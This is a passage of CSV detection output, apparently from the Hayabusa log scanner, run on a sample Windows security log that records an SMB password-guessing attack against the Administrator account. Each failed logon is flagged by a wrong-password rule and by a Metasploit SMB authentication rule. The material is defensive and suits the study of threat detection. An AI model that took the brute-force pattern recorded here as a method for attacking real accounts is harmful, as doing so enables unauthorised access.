Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 